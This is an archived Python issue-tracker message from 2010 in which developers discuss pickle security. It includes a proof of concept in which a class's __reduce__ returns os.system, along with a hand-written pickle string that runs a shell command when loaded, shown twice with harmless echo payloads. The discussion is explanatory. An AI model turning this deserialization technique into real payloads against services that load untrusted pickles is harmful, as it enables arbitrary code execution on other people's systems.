Message 112475 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	lemburg
Recipients	alexandre.vassalotti, belopolsky, exarkun, lemburg, pitrou
Date	2010-08-02.14:11:29
SpamBayes Score	0.0001168751
Marked as misclassified	No
Message-id	<4C56D20F.1080703@egenix.com>
In-reply-to	<4C56D0B5.1010106@egenix.com>

Content
M.-A. Lemburg wrote: > Jean-Paul Calderone wrote: >> >> Jean-Paul Calderone <exarkun@twistedmatrix.com> added the comment: >> >> For example: >> >> exarkun@boson:~$ python >> Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15) >> [GCC 4.4.1] on linux2 >> Type "help", "copyright", "credits" or "license" for more information. >>>>> class x(object): >> ... def __reduce__(self): >> ... import os >> ... return os.system, ('echo "Hello from sploitland"',) >> ... >>>>> import pickle >>>>> pickle.loads(pickle.dumps(x())) >> Hello from sploitland >> 0 > > But here you are not transferring malicious code in the pickle > string, you are just triggering the execution of such code that > you already have (and are in control of). > > Without the definition of class x on the receiving side, there > would be no exploit. > > By adding support for pickling code objects, you'd make it possible > to place the definition of class x into the pickle string and > you would no longer be in control of that code. Hmm, I just tried the code and it seems that you're right: The pickle string does not contain a reference to class x, but only the name of the function to call. Wow, that's a huge hole in Python's pickle system... ... def __reduce__(self): ... import os ... return os.system, ('echo "Bingo"',) ... >>> import pickle >>> pickle.dumps(C()) 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.' >>> C = None >>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.' >>> pickle.loads(s) Bingo 0

M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <exarkun@twistedmatrix.com> added the comment:
>>
>> For example:
>>
>> exarkun@boson:~$ python
>> Python 2.6.4 (r264:75706, Dec  7 2009, 18:45:15) 
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>>>>> class x(object):
>> ...     def __reduce__(self):
>> ...         import os
>> ...         return os.system, ('echo "Hello from sploitland"',)
>> ... 
>>>>> import pickle
>>>>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
> 
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
> 
> Without the definition of class x on the receiving side, there
> would be no exploit.
> 
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.

Hmm, I just tried the code and it seems that you're right:

The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...

...  def __reduce__(self):
...   import os
...   return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0

History
Date	User	Action	Args
2010-08-02 14:11:31	lemburg	set	recipients: + lemburg, exarkun, belopolsky, pitrou, alexandre.vassalotti
2010-08-02 14:11:29	lemburg	link	issue9276 messages
2010-08-02 14:11:29	lemburg	create